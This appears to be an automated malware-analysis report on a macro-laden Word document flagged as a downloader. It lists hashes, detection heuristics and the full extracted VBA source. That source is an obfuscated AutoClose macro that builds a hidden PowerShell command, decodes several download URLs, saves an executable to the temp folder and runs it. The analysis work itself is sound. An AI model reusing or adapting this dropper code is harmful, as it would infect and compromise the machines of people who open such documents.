Office (OOXML) malware analysis — malicious · 155e5a759f101c4b

MALICIOUS

Office (OOXML)

74.9 KB Created: 2017-05-22 22:37:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-01-11

MD5: 57ff1c3145cb3f51b601e47b46936bd3 SHA-1: be6c610f2b928db36bc29ce877068d56d8d76654 SHA-256: 155e5a759f101c4ba4615bf3e8a1e0b7389616c1f07006a57c464d851470c71d

350 Risk Score

Heuristics 8

ClamAV: Doc.Downloader.Powmet-6754309-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Powmet-6754309-0
VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

pVVBCiFJjFAyuCdWesRF = "powe" + "rshell $nwSI = ne" + "w-ob" + "ject Sys" + "tem.Ne" + "t.Web" + "Client;$PxdbKG = new-ob" + "ject ra" + "ndom;  "
           CreateObject("WScript.Shell").Run pVVBCiFJjFAyuCdWesRF + rXZtVXEQYavgvtCviWJy, 0
End Function

Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Matched line in script
```
pVVBCiFJjFAyuCdWesRF = "powe" + "rshell $nwSI = ne" + "w-ob" + "ject Sys" + "tem.Ne" + "t.Web" + "Client;$PxdbKG = new-ob" + "ject ra" + "ndom;  "
           CreateObject("WScript.Shell").Run pVVBCiFJjFAyuCdWesRF + rXZtVXEQYavgvtCviWJy, 0
End Function
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

pVVBCiFJjFAyuCdWesRF = "powe" + "rshell $nwSI = ne" + "w-ob" + "ject Sys" + "tem.Ne" + "t.Web" + "Client;$PxdbKG = new-ob" + "ject ra" + "ndom;  "
           CreateObject("WScript.Shell").Run pVVBCiFJjFAyuCdWesRF + rXZtVXEQYavgvtCviWJy, 0
End Function

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Sub AutoClose()
Dim btqKJnlIiuVdgnN
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1842 bytes
SHA-256: `ddd687140ce74bb9bf8bf6be4be28c3304de35fc1dce9e01d468a8d7e2bfb824`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoClose() Dim btqKJnlIiuVdgnN Dim bowEUbxEVKxfu Dim iLEPnHnkvJnQoSkxYaRUSZd bowEUbxEVKxfu = "$FYbUTOSjSQ = 'hnmfLtnmfLtnmfLpnmfL:nmfL/nmfL/nmfLrnmfLonmfLcnmfLknmfLjnmfLonmfLnnmfLanmfLdnmfLdnmfL.nmfLtnmfLonmfLpnmfL/nmfLanmfLdnmfLmnmfLinmfLnnmfL.nmfLpnmfLhnmfLpnmfL?nmfLfnmfL=nmfL1nmfL,nmfLhnmfLtnmfLtnmfLpnmfL:nmfL/nmfL/nmfLtnmfLsnmfLinmfLvnmfLnnmfL.nmfLcnmfLonmfLmnmfL.nmfLvnmfLnnmfL/nmfLsnmfLynmfLsnmfLtnmfLenmfLmnmfL/nmfLlnmfLonmfLgnmfLsnmfL/nmfL.nmfL.nmfL.nmfL/nmfL1nmfL,nmfLhnmfLtnmfLtnmfLpnmfL:nmfL/nmfL/nmfLlnmfLonmfLnnmfLgnmfLvnmfLanmfLnnmfLcnmfLenmfLrnmfLanmfLmnmfLinmfLcnmfLsnmfL.nmfLcnmfLonmfLmnmfL.nmfLvnmfLnnmfL/nmfLinmfLmnmfLanmfLgnmfLenmfL/nmfLfnmfLlnmfLanmfLgnmfLsnmfL/nmfL.nmfL.nmfL.nmfL/nmfL1' -replace 'nmfL', '';" btqKJnlIiuVdgnN = "$gjcyZBvw = $FYbUTOSjSQ.Split(',');$BKmPcKk = $PxdbKG.next(1, 65536);$jGCKz = $env:temp + '' + $BKmPcKk + '.exe';for" + "each($AgYEoz in $gjcyZBvw){try{$nwSI.Downl" + "oadFile($AgYEoz.ToString(), $jGCKz);Start-Process $jGCKz;break;}catch{write-host $_.Exception.Message;}}" iLEPnHnkvJnQoSkxYaRUSZd = bowEUbxEVKxfu + btqKJnlIiuVdgnN ocbJqiSUqOfClwEHkfiJ (iLEPnHnkvJnQoSkxYaRUSZd) End Sub Function ocbJqiSUqOfClwEHkfiJ(rXZtVXEQYavgvtCviWJy) Dim pVVBCiFJjFAyuCdWesRF pVVBCiFJjFAyuCdWesRF = "powe" + "rshell $nwSI = ne" + "w-ob" + "ject Sys" + "tem.Ne" + "t.Web" + "Client;$PxdbKG = new-ob" + "ject ra" + "ndom; " CreateObject("WScript.Shell").Run pVVBCiFJjFAyuCdWesRF + rXZtVXEQYavgvtCviWJy, 0 End Function Attribute VB_Name = "Module1" Attribute VB_Name = "Module2"
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	15872 bytes
SHA-256: `416f09e3cca1b00c4c3e879e12d5505ccb1c1b4a17d270b916a87e7358257ead`
Detection ClamAV: Doc.Downloader.Powmet-6754309-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.